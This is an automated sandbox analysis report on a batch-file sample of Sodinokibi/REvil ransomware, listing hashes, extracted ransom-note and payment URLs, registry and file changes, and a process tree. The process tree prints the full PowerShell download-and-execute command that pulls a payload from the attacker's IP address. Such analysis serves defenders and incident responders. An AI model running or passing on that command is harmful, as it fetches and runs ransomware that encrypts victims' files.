Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
01-09-2020 20:10
Static task
static1
Behavioral task
behavioral1
Sample
484333e52a633dd4ddba453c88728166.bat
Resource
win7
Behavioral task
behavioral2
Sample
484333e52a633dd4ddba453c88728166.bat
Resource
win10v200722
General
-
Target
484333e52a633dd4ddba453c88728166.bat
-
Size
220B
-
MD5
78a20a9e11dcafee6975c27337f224f6
-
SHA1
bf2f2d540d8c622f2c35950b2517e06bd1ffa085
-
SHA256
bdb3f36c480f19ec8d2aa9a181d0f606f53586ba44e2065be4b5a94cc4460913
-
SHA512
206fdef2f70c68a78c5a261d15e795faf814384a3124f9dc149ce215eb15e9b2fb7dea1aef79183228a5af6d014bd3dc6cacaaab6b9cbeaf81d95475406717ab
Malware Config
Extracted
http://185.103.242.78/pastes/484333e52a633dd4ddba453c88728166
Extracted
C:\19887099q-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA0CFA7B45EE3878
http://decryptor.cc/CA0CFA7B45EE3878
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 38 IoCs
Processes:
powershell.exeflow pid process 10 3944 powershell.exe 17 3944 powershell.exe 19 3944 powershell.exe 21 3944 powershell.exe 24 3944 powershell.exe 26 3944 powershell.exe 28 3944 powershell.exe 30 3944 powershell.exe 32 3944 powershell.exe 34 3944 powershell.exe 37 3944 powershell.exe 39 3944 powershell.exe 40 3944 powershell.exe 42 3944 powershell.exe 44 3944 powershell.exe 46 3944 powershell.exe 48 3944 powershell.exe 50 3944 powershell.exe 52 3944 powershell.exe 54 3944 powershell.exe 56 3944 powershell.exe 58 3944 powershell.exe 60 3944 powershell.exe 62 3944 powershell.exe 64 3944 powershell.exe 66 3944 powershell.exe 68 3944 powershell.exe 70 3944 powershell.exe 72 3944 powershell.exe 74 3944 powershell.exe 76 3944 powershell.exe 79 3944 powershell.exe 81 3944 powershell.exe 83 3944 powershell.exe 85 3944 powershell.exe 87 3944 powershell.exe 89 3944 powershell.exe 90 3944 powershell.exe -
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\users\admin\pictures\SplitMerge.tiff powershell.exe File renamed C:\Users\Admin\Pictures\SplitMerge.tiff => \??\c:\users\admin\pictures\SplitMerge.tiff.19887099q powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6t1wmxq8d123z.bmp" powershell.exe -
Drops file in Program Files directory 15 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\19887099q-readme.txt powershell.exe File created \??\c:\program files (x86)\19887099q-readme.txt powershell.exe File opened for modification \??\c:\program files\ResetUnblock.emz powershell.exe File opened for modification \??\c:\program files\CompleteRedo.3gp powershell.exe File opened for modification \??\c:\program files\EnterUnlock.xltm powershell.exe File opened for modification \??\c:\program files\NewCompare.M2T powershell.exe File opened for modification \??\c:\program files\ReadGroup.tif powershell.exe File opened for modification \??\c:\program files\SetPing.docx powershell.exe File opened for modification \??\c:\program files\UnprotectFind.txt powershell.exe File opened for modification \??\c:\program files\SearchMeasure.csv powershell.exe File opened for modification \??\c:\program files\ConvertFromGet.xltm powershell.exe File opened for modification \??\c:\program files\EnableRemove.docx powershell.exe File opened for modification \??\c:\program files\FormatGroup.emz powershell.exe File opened for modification \??\c:\program files\FormatGroup.wps powershell.exe File opened for modification \??\c:\program files\UnprotectFind.vssm powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat svchost.exe -
Modifies data under HKEY_USERS 6 IoCs
Processes:
svchost.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionReason = "1" svchost.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionTime = d8301124ac80d601 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecision = "0" svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7 svchost.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepid process 3944 powershell.exe 3944 powershell.exe 3944 powershell.exe 3944 powershell.exe 3944 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
svchost.exepowershell.exevssvc.exedescription pid process Token: SeShutdownPrivilege 628 svchost.exe Token: SeCreatePagefilePrivilege 628 svchost.exe Token: SeDebugPrivilege 3944 powershell.exe Token: SeDebugPrivilege 3944 powershell.exe Token: SeTakeOwnershipPrivilege 3944 powershell.exe Token: SeBackupPrivilege 3084 vssvc.exe Token: SeRestorePrivilege 3084 vssvc.exe Token: SeAuditPrivilege 3084 vssvc.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3888 wrote to memory of 3944 3888 cmd.exe powershell.exe PID 3888 wrote to memory of 3944 3888 cmd.exe powershell.exe PID 3888 wrote to memory of 3944 3888 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\484333e52a633dd4ddba453c88728166.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/484333e52a633dd4ddba453c88728166');Invoke-ZRFBQPCGMEHHZ;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:628
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:3084